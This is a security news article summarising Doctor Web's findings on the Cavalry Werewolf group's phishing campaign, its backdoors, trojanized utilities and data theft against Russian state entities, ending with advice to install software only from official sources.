Cybersecurity experts at Doctor Web have identified a targeted cyberattack directed at a Russian government-owned entity by a hacker group identified as Cavalry Werewolf.
This operation came to light in July 2025, when the organization recognized spam emails originating from its corporate address, prompting an extensive internal inquiry.
Doctor Web’s analysis linked this incident to a phishing campaign that leveraged password-protected archives disguised as legitimate files. Examination of these archives uncovered a previously unrecognized backdoor, designated as BackDoor.ShellNET.1.
According to Doctor Web’s technical report, this backdoor was based on open-source Reverse-Shell-CS code. Upon activation, the malware established a reverse shell connection, granting attackers the ability to execute commands remotely as well as distribute additional tools.
Furthermore, the attackers utilized the built-in Windows BITSAdmin utility to acquire supplementary payloads, including the infostealer Trojan.FileSpyNET.5. This malware gathered documents, spreadsheets, text files, and images from compromised systems before transmitting them to an external server. Additionally, another component, BackDoor.Tunnel.41, established a SOCKS5 tunnel for covert communication and remote control.
During their investigation, Doctor Web’s researchers noted that Cavalry Werewolf relies on a combination of open-source frameworks and custom backdoors, created in languages such as C#, C++, and Golang, to facilitate remote command execution, proxy tunneling, data exfiltration, and persistence through modifications to the Windows registry and scheduled tasks.
A significant number of these implants were managed via Telegram bots, a method increasingly utilized to oversee infected hosts while concealing the attackers’ infrastructure. Doctor Web also discovered trojanized versions of widely-used utilities, including WinRAR, 7-Zip, and Visual Studio Code, which could trigger secondary malware upon execution.
The operators of Cavalry Werewolf collected system and user information using standard Windows commands like whoami, ipconfig /all, and net user. They additionally reviewed local files and network settings to strategize the next stage of their assault. Analysts suspect that the hackers aimed to extract sensitive information and internal network configurations.
Who is Cavalry Werewolf
Cavalry Werewolf first garnered attention during a campaign that spanned from May to August 2025, targeting Russian state entities and major industrial firms within sectors such as energy, mining, and manufacturing. The group employed spear-phishing emails masquerading as communications from Kyrgyz government officials, facilitating malware deployment and unauthorized access.
In previous attacks, Cavalry Werewolf has utilized custom backdoors and proxy tools like “FoalShell” and “StallionRAT” to enable remote execution and data theft capabilities. Analysts have also identified overlaps in tools and infrastructure with other groups, such as Silent Lynx and YoroTrooper, suggesting a potential connection or collaboration among these actors.
Look Before You Leap… or Weep
While the origins of the Cavalry Werewolf group remain ambiguous, Doctor Web’s investigation reveals that they continue to expand their toolkit, innovating and repurposing old code for subsequent attacks.
The presence of trojanized versions of well-known software like WinRAR, 7-Zip, and Visual Studio Code poses a significant risk, especially if the focus shifts from government networks to general consumers. A single reckless download could lead to complete system compromise.
This underlines the imperative of not downloading software from third-party websites, regardless of the perceived reliability of user reviews. It is essential to avoid installing applications, games, or utilities from unverified sources in the interest of convenience. Always leverage official platforms and, even in those instances, use VirusTotal and your antivirus software to scan new files before installation.
The aim of this information is not to instill fear but rather to foster a culture of security awareness.
